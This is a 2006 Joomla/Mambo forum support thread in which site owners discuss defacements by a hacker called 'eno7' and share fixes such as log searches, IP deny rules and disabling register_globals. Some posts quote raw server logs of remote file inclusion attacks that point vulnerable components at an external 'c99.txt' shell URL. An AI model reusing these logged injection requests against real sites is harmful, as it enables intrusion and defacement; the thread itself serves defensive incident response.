Page 1 of 2
Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 10, 2006 12:01 pm
by Maggles
I had a look here:
http://www.[ ** removed hacker's list (kudos) **]/component/option, ... no7/page,1
Because this person has hacked my site twice in the last 2 days. There seems to be a lot of joomla/mambo sites on the list of reported attacks of sites he's hacked and I wondered if anyone has any idea how this guy is getting in. There must be a common component, module or mambot that he's using.
Does anyone have any ideas?
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 10, 2006 12:07 pm
by Mike G.
We were also hacked by this guy ...
Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?
Regards,
Mike
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 10, 2006 12:19 pm
by Maggles
Mike G. wrote:
We were also hacked by this guy ...
Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?
Regards,
Mike
We used to have a phpBB forum but changed it to vBulletin about a year ago but there is still a phpbb component installed - my other half is the techie and he did tell me why at the weekend that we can't remove it but I can't remember why right now - I went though removing all components and modules that we don't need/use and removed them as well as updated any to the latest versions etc... and my other half has tried changing settings to make it even more secure but he still got to the site for a second time. Im just glad we take regular backups and save them elsewhere.
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 10, 2006 12:28 pm
by RobS
@Maggles,
I have sent you a Personal Message.
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 10, 2006 12:30 pm
by Maggles
RobS wrote:
@Maggles,
I have sent you a Personal Message.
Thanks, I've emailed you to the address you supplied.
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 10, 2006 1:49 pm
by infograf768
Turk Telecom also for an attack through ext_calendar.
IP 81.215.180.206
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 10, 2006 2:04 pm
by Mike G.
The attack to our site came from 81.213.180.37, also a turkish site.
As I found in the logfiles, they used a PHP/BackDoor script infecting the site trough the phpBB download feature !!!
CAUTION! The script resides at this site: [mod edit: do not post links to viruses. link omited - ChiefGoFor] and might become active if you follow the link, my virusscanner (McAfee) was detecting it in the browser.
Regards,
Mike
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 10, 2006 2:13 pm
by LorenzoG
Warning, above link contains a trojan virus script .. as adviced by the poster
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 10, 2006 3:36 pm
by Mike G.
Hmm ... but it might be helpful for other users to know what to search in their logfiles ....
So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.
Regards,
Mike
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 10, 2006 4:05 pm
by ChiefGoFor
Mike G. wrote:
Hmm ... but it might be helpful for other users to know what to search in their logfiles ....
So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.
I agree with you. It was kind of a catch 22 there. Your solution for seaching for those key terms is great! Thank you for the information.
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 10, 2006 4:11 pm
by RobS
Searching for "CONFIG_EXT", "mosConfig_absolute_path" and "mosConfig_live_site" will also reveal some of the recent exploit attempts.
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 17, 2006 2:16 pm
by CiPHeR
Our site also got hacked this weekend by this same Eno7 guy - his page over writes your configuration.php file - how do we prevent this from happening again... this is a very serious issue. I am running the latest Joomla 1.0.10 and VirtueMart 1.0.6 along with SMF RC1.2. Is there some common denominator that allows this guy easy access to hack Joomla powered sites? Everything in our root folder of our site is read only, so how did this happen?
Thanks
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 17, 2006 2:26 pm
by ChiefGoFor
To my knowedge, this is not a "Joomla" issue. It is an issue with the components not using some key Joomla Security measures. I think your case, the culprit is SMF.
RobS knows more about it than I do, so I will let him give you a more formal answer.
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 17, 2006 2:38 pm
by anna.y
What are the practical steps to restore the website. We've just been hacked through SMF component:
85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=[EDITED by mod for security reasons]?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......
And then what are the practical steps to prevent it from recurring
Thank you
Anna
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 17, 2006 2:45 pm
by infograf768
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 17, 2006 2:52 pm
by anna.y
Thank you
Anna
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 17, 2006 3:32 pm
by CiPHeR
Thanks...
One question... will that fix prevent this clown from doing this again?
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 24, 2006 9:22 am
by kolle
CiPHeR wrote:
One question... will that fix prevent this clown from doing this again?
i´d love to know that!
anybody.. :-*
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 24, 2006 3:57 pm
by zomertje
Block the IP in the .htaccess file:
deny from xxx.xxx.xxx.xxx
If it comes from the same place
Or disable the component and upgrade
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Jul 24, 2006 5:42 pm
by Peter Koch
zomertje wrote:
Block the IP in the .htaccess file:
deny from xxx.xxx.xxx.xxx
That wont help since it is a dynamic IP of that provider who is known to support or at least not do anything against hackers (his name not allowed to be told in these forums otherwise you get flamed). The same computer may have another IP next time.
You would need to ban all IP's of that provide. In case you need them PM me and I will send you the whole range.
Re: Joomla/MamboHacked Sites By eno7
Posted: Tue Jul 25, 2006 2:25 am
by anna.y
CiPHeR wrote:
Thanks...
One question... will that fix prevent this clown from doing this again?
Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.
Additionally my Server Host turned global_registers to OFF as recommended.
Hope this works for you as well
Anna
Re: Joomla/MamboHacked Sites By eno7
Posted: Tue Jul 25, 2006 3:07 am
by rliskey
I had 7 sites hacked by someone with the same signature. Only three of these sites were Joomla sites. They defaced the index.php file and uploaded a file called "fix.php". If they did more I haven't found it yet.
What all the hacked sites have in common is, 1) they're all at one ISP and 2) they're all using PHP/MySQL.
Seems the exploit could be seeking out ANY poor php code, whether in a Joomla component or in any other script.
If Joomla pros would like log files or other details, contact me.
I'd also appreciate some help. Rebuilding seven sites is an intimidating task, especially since the way they're getting in doesn't appear to be clear yet.
Re: Joomla/MamboHacked Sites By eno7
Posted: Tue Jul 25, 2006 5:28 am
by rliskey
Following the trail...
From the log files. Is this how they got in? What might this do?
85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278
http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"
Re: Joomla/MamboHacked Sites By eno7
Posted: Tue Jul 25, 2006 6:39 am
by infograf768
using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK
Re: Joomla/MamboHacked Sites By eno7
Posted: Tue Jul 25, 2006 12:00 pm
by CiPHeR
anna.y wrote:
CiPHeR wrote:
Thanks...
One question... will that fix prevent this clown from doing this again?
Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.
Additionally my Server Host turned global_registers to OFF as recommended.
Hope this works for you as well
Anna
I dont know why all hosts DONT have register globals=OFF!
Re: Joomla/MamboHacked Sites By eno7
Posted: Tue Jul 25, 2006 12:16 pm
by Elpie
CiPHeR wrote:
I dont know why all hosts DONT have register globals=OFF!
register_globals is not, in itself, insecure - the problem is that globals is often relied upon by inexperienced developers who are unaware of the issues that can arise with globals if their code is not clean and secure. Because so many scripts rely on register_globals being on, hosts have been reluctant to turn them off (or keep them off if they are running PHP 4.2.0 or higher) - you can imagine the screams from customers if hosts suddenly disabled globals and people had their sites breaking all over the servers!
So, if people do not report to their hosts when sites get hacked, or dont ask their hosts to turn register_globals off, hosts will sit in blissful ignorance thinking their customers are happy with the settings the way they are.
Re: Joomla/MamboHacked Sites By eno7
Posted: Tue Jul 25, 2006 4:56 pm
by anna.y
infograf768 wrote:
using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK
I got hacked through older version of com_SMF and deleting all root files and re-installing everything was NOT an option.
All I had to do in addition to adding the recommended line was check which files were removed or altered by the hacker (two) and simply get those two files from my site backup.
It was rather simple and as I said despite hundreds attempts of hacking I'm having no further problems (keeping my fingers crossed isprobably helping as well...
)
Anna
Re: Joomla/MamboHacked Sites By eno7
Posted: Wed Aug 09, 2006 8:17 am
by omlex
How he able to alter the MYSQL db?
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Aug 14, 2006 2:46 am
by berlin
rliskey wrote:
Following the trail...
From the log files. Is this how they got in? What might this do?
85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278
http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"
I was hacked by a turkish hacker today.
[
Code: Select all
14-Aug-2006 07:20:22] PHP Warning: main(http://mi.verizon.net.do/carlos18/therules25.dot): failed to open stream: HTTP request failed! HTTP/1.1 404 Object Not Found
in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning: main(): Failed opening 'http://mi.verizon.net.do/carlos18/therules25.dot' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning: main(): Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 97
i don't know why it shows turx.nl is extcalendar the culprit?
Re: Joomla/MamboHacked Sites By eno7
Posted: Mon Aug 14, 2006 6:13 am
by infograf768
What you are posting looks like the error log and not the raw logs.
Download and open your rawlogs in an editor to check for GET and "mosconfig" strings so as to figure exactly where they got in.